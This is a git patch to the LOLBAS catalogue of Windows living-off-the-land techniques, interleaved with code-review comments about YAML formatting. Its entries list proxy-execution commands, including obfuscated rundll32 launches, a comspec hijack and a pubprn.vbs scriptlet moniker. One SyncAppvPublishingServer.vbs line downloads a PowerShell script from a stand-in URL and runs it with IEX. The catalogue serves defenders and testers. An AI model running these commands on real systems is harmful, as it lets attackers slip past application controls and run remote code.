From bac3b9e56c3fe7db3ffe0f17c6774c11568f06da Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 26 Sep 2018 11:41:58 +0200 Subject: [PATCH] Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files --- ...webportal.ps1 => MDFromYaml-webportal.ps1} | 4 +- yml/OSBinaries/Cmdkey.yml | 2 +- yml/OSLibraries/Advpack.yml | 2 +- yml/OSLibraries/Ieadvpack.yml | 4 +- yml/OSLibraries/Ieframe.yml | 6 +- yml/OSLibraries/Mshtml.yml | 8 +-- yml/OSLibraries/Pcwutl.yml | 6 +- yml/OSLibraries/Setupapi.yml | 2 +- yml/OSLibraries/Shdocvw.yml | 6 +- yml/OSLibraries/Shell32.yml | 12 ++-- yml/OSLibraries/Syssetup.yml | 2 +- yml/OSLibraries/Url.yml | 18 ++--- yml/OSLibraries/Zipfldr.yml | 10 +-- yml/OSScripts/CL_mutexverifiers.yml | 32 ++++++--- yml/OSScripts/Cl_invocation.yml | 34 ++++++---- yml/OSScripts/Manage-bde.yml | 36 +++++++--- yml/OSScripts/Pubprn.yml | 35 ++++++---- yml/OSScripts/Slmgr.yml | 37 ++++++---- yml/OSScripts/Syncappvpublishingserver.yml | 32 ++++++--- yml/OSScripts/Winrm.yml | 68 +++++++++++++------ yml/OSScripts/pester.yml | 35 ++++++---- yml/OtherMSBinaries/Appvlp.yml | 25 ++++--- yml/OtherMSBinaries/Bginfo.yml | 5 +- yml/OtherMSBinaries/Cdb.yml | 19 +++--- yml/OtherMSBinaries/Csi.yml | 17 +++-- yml/OtherMSBinaries/Dnx.yml | 14 ++-- yml/OtherMSBinaries/Dxcap.yml | 15 ++-- yml/OtherMSBinaries/Mftrace.yml | 21 +++--- yml/OtherMSBinaries/Msdeploy.yml | 13 ++-- yml/OtherMSBinaries/Msxsl.yml | 17 +++-- yml/OtherMSBinaries/Rcsi.yml | 12 ++-- yml/OtherMSBinaries/Sqldumper.yml | 17 +++-- yml/OtherMSBinaries/Sqlps.yml | 13 ++-- yml/OtherMSBinaries/Sqltoolsps.yml | 13 ++-- yml/OtherMSBinaries/Te.yml | 14 ++-- yml/OtherMSBinaries/Tracker.yml | 14 ++-- yml/OtherMSBinaries/Vsjitdebugger.yml | 15 ++-- yml/OtherMSBinaries/Winword.yml | 15 ++-- 38 files changed, 405 insertions(+), 245 deletions(-) rename Mgmt-Scripts/{Draft-MDFromYaml-webportal.ps1 => MDFromYaml-webportal.ps1} (99%) 
diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/MDFromYaml-webportal.ps1 similarity index 99% rename from Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 rename to Mgmt-Scripts/MDFromYaml-webportal.ps1 index e030eb6..fdf8121 100644 --- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 +++ b/Mgmt-Scripts/MDFromYaml-webportal.ps1 @@ -52,7 +52,7 @@ function Convert-YamlToMD if($grp.Category -eq "Upload"){$Uplo += $grp} if($grp.Category -eq "Encode"){$Enco += $grp} if($grp.Category -eq "Decode"){$Deco += $grp} - if($grp.Category -eq "Alternate data streams"){$ADS += $grp} + if($grp.Category -eq "ADS"){$ADS += $grp} if($grp.Category -eq "Copy"){$Copy += $grp} if($grp.Category -eq "Credentials"){$Cred += $grp} if($grp.Category -eq "Compile"){$Comp += $grp} @@ -333,6 +333,8 @@ function Invoke-GenerateMD } #Generate the stuff! +# Remember to delete existing files first or else it will only append... + #Bins Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 41ad530..1df1920 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -18,7 +18,7 @@ Full Path: Code Sample: - Code: Detection: - - IOC: Usage of this command could be and IOC + - IOC: Usage of this command could be an IOC Resources: - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 190c6ad..99a96a3 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml 
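Review bot: After the matched string becomes "ADS", a yml whose Category still reads "Alternate data streams" matches no branch of this if chain and silently drops out of every group, and the chain visible here has no fallback for a value that matches nothing. Add a final `else { Write-Warning "Unknown category: $($grp.Category)" }` so a stale or misspelled category surfaces at generation time instead of as a page that never appears. Convert-YamlToMD starts outside the hunk, so I cannot see whether a default is handled later in the function.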
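Review bot: The added reminder comment records a footgun rather than removing it: if Invoke-GenerateMD appends to an output file that already exists, every rerun of this script duplicates each page under c:\tamp. The append presumably comes from the file writer inside Invoke-GenerateMD, whose body lies above this hunk; overwriting there, or removing the existing file before the first write, would make the comment unnecessary. The output paths on the following lines are also hard-coded to `c:\tamp\...` while the input paths derive from `$mainpath`; deriving both from one variable would make the script usable outside the author's machine.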
@@ -1,7 +1,7 @@ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5fcad18..317beac 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,7 +1,7 @@ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, @@ -49,7 +49,7 @@ Code Sample: - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf - Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct Detection: - - IOC: '' + - IOC: Resources: - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ - Link: https://twitter.com/pabraeken/status/991695411902599168 diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 6c8fa19..d30ea52 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml @@ -1,13 +1,13 @@ --- Name: Ieaframe.dll Description: Internet Browser DLL for translating HTML code. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 
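Review bot: Replacing `Author: ''` with a bare `Author:` changes the value from an empty string to YAML null; the same swap is made for `- Code:` and `- IOC:` in Ieadvpack, Ieframe, Mshtml, Pcwutl, Shdocvw, Shell32, Url and Zipfldr, and for `Author:` in Setupapi and Syssetup. Whether the Markdown generator tolerates null here cannot be seen from this diff, but in PowerShell `$null` and `''` behave differently in comparisons and string joins, so the template should commit to one form and the converter should coerce the field to a string before using it. Verify this against the generator before merging, since every OSLibraries page is affected.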
@@ -18,7 +18,7 @@ Full Path: Code Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - - IOC: '' + - IOC: Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 73a0852..a61b70b 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,13 +1,13 @@ --- Name: Mshtml.dll Description: Microsoft HTML Viewer -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). UseCase: Launch an HTA application. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -16,9 +16,9 @@ Full Path: - Path: c:\windows\system32\mshtml.dll - Path: c:\windows\syswow64\mshtml.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://twitter.com/pabraeken/status/998567549670477824 - Link: https://windows10dll.nirsoft.net/mshtml_dll.html diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index ac12eb0..a1329eb 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml 
@@ -1,13 +1,13 @@ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe Description: Launch executable by calling the LaunchApplication function. UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -16,7 +16,7 @@ Full Path: - Path: c:\windows\system32\pcwutl.dll - Path: c:\windows\syswow64\pcwutl.dll Code Sample: - - Code: '' + - Code: Detection: - IOC: Resources: diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 7754852..90939ed 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -1,7 +1,7 @@ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index a68f07d..16226fd 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,13 +1,13 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 
@@ -18,7 +18,7 @@ Full Path: Code Sample: - Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url Detection: - - IOC: '' + - IOC: Resources: - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 2ad1fcc..81f469d 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -1,13 +1,13 @@ --- Name: Shell32.dll Description: Windows Shell Common Dll -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll Description: Launch a DLL payload by calling the Control_RunDLL function. UseCase: Load a DLL payload. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -15,14 +15,14 @@ Commands: - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Description: Launch an executable by calling the ShellExec_RunDLL function. UseCase: Run an executable payload. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. UseCase: Run an executable payload. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 
@@ -30,9 +30,9 @@ Full Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://twitter.com/Hexacorn/status/885258886428725250 - Link: https://twitter.com/pabraeken/status/991768766898941953 diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 591708c..a021e4a 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,7 +1,7 @@ --- Name: Syssetup.dll Description: Windows NT System Setup -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index e60a344..4aac63e 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,13 +1,13 @@ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" Description: Launch a HTML application payload by calling OpenURL. UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -15,7 +15,7 @@ Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. UseCase: Load an executable payload by calling a .url file with or without quotes. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 
@@ -23,7 +23,7 @@ Commands: - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling OpenURL. UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -31,7 +31,7 @@ Commands: - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe Description: Launch an executable by calling FileProtocolHandler. UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -39,7 +39,7 @@ Commands: - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable by calling FileProtocolHandler. UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -47,7 +47,7 @@ Commands: - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta Description: Launch a HTML application payload by calling FileProtocolHandler. UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -56,9 +56,9 @@ Full Path: - Path: c:\windows\system32\url.dll - Path: c:\windows\syswow64\url.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - Link: https://twitter.com/DissectMalware/status/995348436353470465 
diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index fe866fd..1fc3bc7 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,13 +1,13 @@ --- Name: Zipfldr.dll Description: Compressed Folder library -Author: '' +Author: Created: '2018-05-25' Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe Description: Launch an executable payload by calling RouteTheCall. UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -15,7 +15,7 @@ Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e Description: Launch an executable payload by calling RouteTheCall (obfuscated). UseCase: Launch an executable. - Category: Execution + Category: Execute Privileges: User MitreID: T1085 MItreLink: https://attack.mitre.org/wiki/Technique/T1085 @@ -24,9 +24,9 @@ Full Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll Code Sample: - - Code: '' + - Code: Detection: - - IOC: '' + - IOC: Resources: - Link: https://twitter.com/moriarty_meng/status/977848311603380224 - Link: https://twitter.com/bohops/status/997896811904929792 diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index f8189b7..9b0faea 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml 
@@ -1,18 +1,28 @@ --- Name: CL_Mutexverifiers.ps1 -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1" + - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1 Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 - - C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 - - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 -Code Sample: [] -Detection: [] + - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 + - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/995111125447577600 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate) + - Link: https://twitter.com/pabraeken/status/995111125447577600 +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 895c775..4266e6d 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml 
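Review bot: Dropping the double quotes around the Command changes its meaning: inside `"..."` YAML turns `\\` into `\` and `\n` into a line break, but in the now-plain scalar both stay literal, so the rendered command reads `. C:\\Windows\\diagnostics\\...\nrunAfterCancelProcess calc.ps1`. Either restore the quotes or write it as a block scalar (`Command: |`) with single backslashes and a real line break. Separately, Full Path lists the WindowsUpdate copy twice while the AERO copy the Command itself dot-sources is absent, and `Description:` at the top is left empty where the other OSScripts entries in this commit received a one-line description.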
@@ -1,20 +1,30 @@ --- Name: CL_Invocation.ps1 -Description: Execute -Author: '' +Description: Aero diagnostics script +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke [args] Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 - - C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 - - C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 -Code Sample: [] -Detection: [] + - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 + - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 + - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ - - https://twitter.com/bohops/status/948548812561436672 - - https://twitter.com/pabraeken/status/995107879345704961 -Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths) + - Link: +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index 549d882..fcfd182 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml 
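Review bot: The rewritten Resources section contains a single empty `- Link:`, so the three references on the removed side (the bohops blog post and the two tweets) are lost rather than converted to the `- Link:` form used in the other files of this commit; restore them as three `- Link:` entries. The Command on the unchanged context line carries the same unquoted `\\` and `\n` sequences as CL_mutexverifiers, which is pre-existing here but worth fixing in the same pass.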
@@ -1,19 +1,37 @@ --- Name: Manage-bde.wsf -Description: Execute -Author: '' +Description: Script for managing BitLocker +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. + Usecase: Proxy execution from script + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. + Usecase: Proxy execution from script + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\manage-bde.wsf -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\manage-bde.wsf +Code Sample: + - Code: +Detection: + - IOC: Manage-bde.wsf should normally not be invoked by a user Resources: - - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 - - https://twitter.com/bohops/status/980659399495741441 -Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack) + - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 + - Link: https://twitter.com/bohops/status/980659399495741441 +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' + - Person: Daniel Bohannon + Handle: '@danielbohannon' +--- \ No newline at end of file diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index 07c4ccb..3452ae4 100644 --- a/yml/OSScripts/Pubprn.yml 
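Review bot: The new Acknowledgement gives Daniel Bohannon's handle as `'@danielbohannon'`, whereas the removed Notes line had `@danielhbohannon`; one of the two is a typo and the new side should be checked against the source before it is published. The correction of Jimmy's handle from `@bophops` to `@bohops` on the same lines looks right and matches the other files.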
+++ b/yml/OSScripts/Pubprn.yml @@ -1,20 +1,29 @@ --- Name: Pubprn.vbs -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct - Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection. + Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs -Code Sample: - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct -Detection: [] + - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs + - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs +Code Sample: + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct +Detection: + - IOC: Resources: - - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ - - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - https://github.com/enigma0x3/windows-operating-system-archaeology -Notes: Thanks to Matt Nelson - @enigma0x3 + - Link: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ + - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - Link: https://github.com/enigma0x3/windows-operating-system-archaeology +Acknowledgement: + - Person: Matt Nelson + Handle: '@enigma0x3' +--- \ No newline at end of file diff --git a/yml/OSScripts/Slmgr.yml b/yml/OSScripts/Slmgr.yml index 1946236..b1ca4bc 100644 --- a/yml/OSScripts/Slmgr.yml +++ b/yml/OSScripts/Slmgr.yml 
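Review bot: `Description:` at the top of the file is left empty on the new side (the old `Execute` value was removed, not replaced), while Slmgr, Manage-bde and the other OSScripts entries in this commit received a one-line description of what the script is. A short line describing the script's legitimate purpose, as done in those files, would keep the generated page consistent.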
@@ -1,20 +1,31 @@ --- Name: Slmgr.vbs -Description: Execute -Author: '' +Description: Script used to manage windows license activation +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs - Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code. + Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - c:\windows\system32\slmgr.vbs - - c:\windows\sysWOW64\slmgr.vbs -Code Sample: - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct -Detection: [] + - Path: C:\Windows\System32\slmgr.vbs + - Path: C:\Windows\SysWOW64\slmgr.vbs +Code Sample: + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg +Detection: + - IOC: Resources: - - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - https://www.youtube.com/watch?v=3gz1QmiMhss -Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee + - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - Link: https://www.youtube.com/watch?v=3gz1QmiMhss +Acknowledgement: + - Person: Matt Nelson + Handle: '@enigma0x3' + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index 6183c84..8f19521 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml 
@@ -1,17 +1,29 @@ --- -Name: SyncAppvPublishingServer.vbs -Description: Execute -Author: '' +Name: Syncappvpublishingserver.vbs +Description: Script used related to app-v and publishing server +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Inject PowerShell script code with the provided arguments + Usecase: Use Powershell host invoked from vbs script + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - C:\Windows\System32\SyncAppvPublishingServer.vbs -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/monoxgas/status/895045566090010624 - - https://twitter.com/subTee/status/855738126882316288 -Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee + - Link: https://twitter.com/monoxgas/status/895045566090010624 + - Link: https://twitter.com/subTee/status/855738126882316288 +Acknowledgement: + - Person: Nick Landers + Handle: '@monoxgas' + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSScripts/Winrm.yml 